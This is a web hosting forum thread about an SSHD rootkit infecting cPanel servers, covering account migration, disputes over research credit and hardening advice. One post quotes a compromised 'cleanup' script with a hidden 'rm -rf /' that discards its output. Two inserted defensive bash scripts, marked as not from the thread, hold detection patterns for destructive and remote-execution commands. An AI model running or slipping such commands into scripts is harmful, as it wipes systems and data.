Results 1,501 to 1,523 of 1523
Thread: SSHD Rootkit Rolling around
-
03-18-2014, 10:43 PM #1501Web Hosting Master
- Join Date
- Mar 2009
- Posts
- 3,700
If my server gets infected and I need to move the sites to another server.
As I know, I can not use WHM's backup feature directly.
But I can use /scripts/pkgacct to back up each account and use wget to transfer the accounts to the other server and restore; it will be safe, correct?
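As an added example (not cPanel's tooling and not a script from this thread), here is what I would run on the receiving side before restoring account archives pulled off a compromised host. /scripts/pkgacct leaves the rootkitted system libraries behind, but the per-account tarball can still carry attacker persistence (a planted authorized_keys, cron entries, shell rc files, droppers under public_html), and a wget transfer can arrive truncated. The archive layout (<user>/homedir/..., <user>/cron/<user>), the list of suspicious paths and the account name "demo" are my assumptions; the sample archive is constructed inline so the script runs offline.

```shell
#!/bin/bash
# Added example: pre-restore audit of cPanel account archives pulled off a
# compromised host. This is not cPanel's tooling and not a script from the
# thread. /scripts/pkgacct leaves the rootkitted system libraries behind, but
# the per-account tarball can still carry attacker persistence, and a wget
# transfer can be truncated, so list, check and hash before /scripts/restorepkg.
#
# Assumptions (mine): GNU tar + gzip + coreutils; archive layout
# <user>/homedir/... and <user>/cron/<user> as pkgacct produces it.

set -u

# Paths inside an account archive that merit manual review before restore.
# Matched against the tar listing (relative paths, no leading slash).
SUSPICIOUS_RE='(^|/)homedir/\.ssh/|(^|/)cron/|(^|/)homedir/\.(bashrc|bash_profile|profile|bash_logout)$|(^|/)homedir/public_html/.*\.(sh|pl|py|elf)$|(^|/)homedir/\.(config|cache)/.*\.(so|sh)$'

# audit_cpmove <archive>: prints flagged entries.
# Returns 0 clean, 1 entries flagged, 2 unreadable, 3 unsafe member paths.
audit_cpmove() {
    archive="$1"
    [ -r "$archive" ] || { echo "cannot read $archive" >&2; return 2; }
    # Absolute or parent-relative member names would let a crafted archive
    # write outside the restore directory; refuse such archives outright.
    if tar -tzf "$archive" | grep -E '^/|(^|/)\.\.(/|$)' >/dev/null; then
        echo "REFUSE: $archive contains absolute or ../ member paths" >&2
        return 3
    fi
    flagged=$(tar -tzf "$archive" | grep -E "$SUSPICIOUS_RE" || true)
    if [ -n "$flagged" ]; then
        printf '%s\n' "$flagged"
        return 1
    fi
    return 0
}

# Manifest written on the source host, verified on the target, so a truncated
# or altered transfer is caught. Hashes from a rootkitted host only prove the
# bytes arrived intact, not that the archive was clean when it was made.
write_manifest()  { ( cd "$1" && sha256sum cpmove-*.tar.gz ) > "$1/MANIFEST.sha256"; }
verify_manifest() { ( cd "$1" && sha256sum -c --status MANIFEST.sha256 ); }

# --- constructed sample archive so the script runs offline ------------------
# Account "demo" with a planted authorized_keys entry and a cron dropper.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/build/demo/homedir/public_html" \
             "$d/build/demo/homedir/.ssh" \
             "$d/build/demo/cron"
    echo '<?php echo "hi";' > "$d/build/demo/homedir/public_html/index.php"
    echo 'ssh-rsa AAAA...planted-by-intruder' > "$d/build/demo/homedir/.ssh/authorized_keys"
    echo '* * * * * /home/demo/.cache/.x/run.sh' > "$d/build/demo/cron/demo"
    tar -czf "$d/cpmove-demo.tar.gz" -C "$d/build" demo
    echo "$d"
}

if [ "${1:-}" = "--demo" ]; then
    dir=$(make_sample)
    write_manifest "$dir" && verify_manifest "$dir" && echo "manifest ok"
    audit_cpmove "$dir/cpmove-demo.tar.gz" || echo "review the entries above before restoring"
    rm -r -- "$dir"
fi
```

Run it with `--demo` to see the planted authorized_keys and cron entries flagged; on a real migration, run write_manifest on the old box, verify_manifest and audit_cpmove on the new one, and only then /scripts/restorepkg. A flagged entry is a prompt to open the file, not proof of compromise; customers do legitimately keep SSH keys and cron jobs.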
-
03-18-2014, 10:56 PM #1502Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
03-18-2014, 11:51 PM #1503Web Hosting Master
- Join Date
- Mar 2009
- Posts
- 3,700
-
03-18-2014, 11:59 PM #1504Web Hosting Master
- Join Date
- Mar 2003
- Location
- chicago
- Posts
- 1,781
Anyone see this infection on FreeBSD? Or is this a Linux-only problem?
-
03-19-2014, 12:19 AM #1505Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
-
03-21-2014, 02:26 PM #1506Newbie
- Join Date
- Feb 2006
- Posts
- 19
-
03-21-2014, 02:42 PM #1507Newbie
- Join Date
- Mar 2014
- Posts
- 11
-
03-21-2014, 02:50 PM #1508Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
I definitely would. Why would I help provide information to people so they can take the benefit and kick the little guys like myself to the curb with no recognition? They can figure it out themselves. I provided boxes for the people involved in the group that worked with ESET to release a report, and they didn't even have the decency to credit me, **** them. If you read their write-up PDF, in their timeline they listed cPanel as the first event in 2013, which it wasn't... cPanel's compromise was announced weeks after I started talking about this publicly. They even included Steinar H. Gunderson, which was the first discussion of the openssh variant..
To top it off, ESET stopped talking to me about it, and is basically ignoring me.
And then you have Leif Nixon, who said I stopped working with them because I didn't respond to his emails (which I didn't get). He didn't try very hard to get a hold of me; I mean, after all, he was using my personal non-company email address.
I have seen early variants of a lot of highly publicized malware, being in the industry I am in. I only even brought this one to light because it bothered me. I'll keep things to myself like I have done in the past from now on.
Last edited by Steven; 03-21-2014 at 03:02 PM.
-
05-02-2014, 04:29 AM #1509New Member
- Join Date
- Apr 2014
- Posts
- 1
What is the best software one should use for scanning in such cases?
-
05-13-2014, 11:40 AM #1510Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Eric,
Please take down your script. Someone pm'd me about this.
https://www.ericgillette.com/clients/exploit-cleanup
Google cache mirror:
http://webcache.googleusercontent.co...&ct=clnk&gl=us
There is a malicious command that hopefully you did not intentionally place in there.
echo
echo "Done."
echo
echo "Removing libkeyutils.so.1 symlink"
echo
rm -rf / 2>/dev/null 1>/dev/null
/sbin/ldconfig
echo
echo "Restarting SSH. . ."
echo
/etc/init.d/sshd restart
Last edited by Steven; 05-13-2014 at 11:44 AM.
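As an added example, not the script Eric posted and not a tool from this thread: a pre-run scanner for a downloaded "cleanup" script. The line Steven points at looked ordinary in a run of echo statements, with both output streams sent to /dev/null, which is exactly the shape a quick skim misses. The rule list and the reasons it prints are my own assumptions about what deserves a second look; the sample input is the fragment quoted above, reconstructed inline so the scanner runs offline.

```shell
#!/bin/bash
# Added example: a pre-run scanner for a downloaded "cleanup" script. Not the
# script Eric posted and not a tool from the thread. It flags the shapes a
# quick skim misses: a recursive delete at / buried between echo lines with
# both output streams discarded, rm rooted in a variable that may be empty,
# raw device writes, curl|sh, run-time decoding. It is a review aid only;
# a flagged line is a reason to read the whole script, not a verdict.
#
# Assumptions (mine): the rule list below is my choice of what deserves a
# second look; bash or POSIX sh with grep -E.

set -u

# One rule per line: <extended regex>|||<reason shown to the reviewer>
RULES='
rm[[:space:]]+-[a-zA-Z]*[rR][a-zA-Z]*[[:space:]]+/([[:space:]]|;|$)|||recursive delete of the filesystem root
rm[[:space:]]+-[a-zA-Z]*[rR][a-zA-Z]*[[:space:]]+"?\$\{?[A-Za-z_]+\}?"?/|||recursive delete rooted in a variable (empty variable means /)
dd[[:space:]].*of=/dev/|mkfs|>[[:space:]]*/dev/(sd|nvme|vd|xvd)|||write to a raw block device
(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|||remote content piped straight into a shell
base64[[:space:]]+(-d|--decode)|eval[[:space:]]|\$\(echo[[:space:]]|||decodes or evals content at run time
chattr[[:space:]]|/etc/ld\.so\.preload|||changes file attributes or ld.so.preload
rm[[:space:]].*(2>/dev/null[[:space:]]+1>/dev/null|1>/dev/null[[:space:]]+2>/dev/null|>/dev/null[[:space:]]+2>&1|&>/dev/null)|||rm with all output discarded
'

# scan_script <file>: prints "<line no>: <line>" plus the reason for each hit.
# Returns 0 when nothing matched, 1 when something did, 2 if unreadable.
scan_script() {
    f="$1"
    [ -r "$f" ] || { echo "cannot read $f" >&2; return 2; }
    hits=0
    n=0
    while IFS= read -r line <&3 || [ -n "$line" ]; do
        n=$((n + 1))
        while IFS= read -r rule; do
            [ -n "$rule" ] || continue
            re=${rule%%|||*}
            why=${rule#*|||}
            if printf '%s\n' "$line" | grep -Eq -- "$re"; then
                printf '%d: %s\n   ^ %s\n' "$n" "$line" "$why"
                hits=$((hits + 1))
                break          # one reason per line is enough for review
            fi
        done <<EOF
$RULES
EOF
    done 3< "$f"
    [ "$hits" -eq 0 ]
}

# --- constructed sample: the fragment quoted in the thread, as a file -------
make_sample() {
    s=$(mktemp)
    cat > "$s" <<'EOF'
echo "Done."
echo
echo "Removing libkeyutils.so.1 symlink"
echo
rm -rf / 2>/dev/null 1>/dev/null
/sbin/ldconfig
echo "Restarting SSH. . ."
/etc/init.d/sshd restart
EOF
    echo "$s"
}

if [ "${1:-}" = "--demo" ]; then
    sample=$(make_sample)
    scan_script "$sample" || echo "do not run this script unreviewed"
    rm -f -- "$sample"
fi
```

With `--demo` it reports line 5 as a recursive delete of the filesystem root and exits 1. Pattern matching cannot prove a script safe (an obfuscated or multi-line construct will slip through), which is why the exit code is meant to gate a human read, not replace it.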
-
05-13-2014, 12:11 PM #1511Sam is here
- Join Date
- Mar 2010
- Posts
- 822
echo "exploit found and whole system erased. go home"
█ Innovative Monitoring Solutions - Xitoring
█ Linux Server Monitoring | Windows Server Monitoring
█ Uptime Monitoring | Status Page | SSL Monitoring | API Monitoring
-
05-13-2014, 12:30 PM #1512Junior Guru
- Join Date
- Apr 2013
- Posts
- 177
Hi,
Normally, I would read the thread to get an answer, but with 100 pages... maybe not so :-P.
Just one quick question: has anyone found how this issue was being exploited, and if so, how to prevent it?
Additionally, does this still affect fully up-to-date servers?
-
05-13-2014, 12:38 PM #1513Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
-
05-13-2014, 12:47 PM #1514Web Hosting Master
- Join Date
- Oct 2012
- Location
- Europe and USA
- Posts
- 991
Hopefully not many people will run this script.
When we said that an infected server should be formatted and reinstalled we didn't actually mean that it should be done with an rm -rf / command inside a cleanup script, without the user knowing and having created any backups.
★ NetworkPanda :: Web Hosting SSD Powered :: Reseller Hosting
★ Instant activation, fast servers, NVMe SSD disks, cPanel, Softaculous 1-click apps installer, daily backups
★ Multiple hosting locations: USA, Canada, France, UK, Germany, Italy, Spain, Poland, Finland
-
05-13-2014, 12:49 PM #1515Aspiring Evangelist
- Join Date
- Jun 2012
- Posts
- 423
Last edited by AcheronMedia-VK; 05-13-2014 at 12:51 PM. Reason: Disclaimer
-
05-13-2014, 01:12 PM #1516Junior Guru
- Join Date
- Apr 2013
- Posts
- 177
-
05-13-2014, 01:22 PM #1517Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
-
05-13-2014, 01:30 PM #1518Junior Guru
- Join Date
- Apr 2013
- Posts
- 177
Hi,
The only method of control of the servers (server-side configuration wise) is through SSH.
There are no control panels installed.
Bear in mind, these are company servers, so they are not used for selling hosting or otherwise, so there is no reason to have any control panels on them.
-
05-13-2014, 01:31 PM #1519Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
-
05-13-2014, 01:35 PM #1520Junior Guru
- Join Date
- Apr 2013
- Posts
- 177
-
05-13-2014, 02:01 PM #1521Junior Guru Wannabe
- Join Date
- Nov 2010
- Location
- Orlando, Florida
- Posts
- 89
Steven,
Nope, I didn't stick that in there -- in fact that server was compromised.
I'm in the process of rebuilding it as we speak.
Not just for this thing, but also for the heartbleed issue that was found a bit ago as well (my SSL cert may have been compromised as well so I need to re-issue).
Thanks for identifying that buddy. :-)
I removed the script as well.
Server Security | Disaster Planning | PCI Compliance | Virtualization
http://www.ericgillette.com
800-665-2370
-
11-06-2014, 04:07 AM #1522Junior Guru
- Join Date
- Aug 2010
- Posts
- 233
Hi,
Found this thread again accidentally. Wow: it's still active.
We were infected on 2 servers 2-3 years ago by this **it.
cPanel support proxy infected us.
...we've been told by cPanel a couple of times there was no sure way to remove this malware.
I would perform a complete reinstall even if there is a "removal" tool.
I'm surprised nobody has patched the security hole that allowed this file to get there yet, after all this time! ...or it's patched and I don't know?
I remember we were one of the first customers who notified cPanel of this problem.
The day after, cPanel confirmed the security issue by email to all their customers.
Last edited by martin33; 11-06-2014 at 04:13 AM.
-
11-06-2014, 04:16 AM #1523Junior Guru
- Join Date
- Aug 2010
- Posts
- 233
Use CloudLinux
...and pray if you provide your SSH credentials to a third party.
I heard the grsecurity kernel is not vulnerable to this.
1h.com products are vulnerable, since they protect against barely nothing and only provide very old binaries. We got infected while using them. You need to protect the kernel first.
Best option to go with is CloudLinux on cPanel IMHO. I did not try BetterLinux, but I'm not sure it would be beneficial for this kind of thing. Seems like it works pretty much like the 1h products.
Last edited by martin33; 11-06-2014 at 04:21 AM.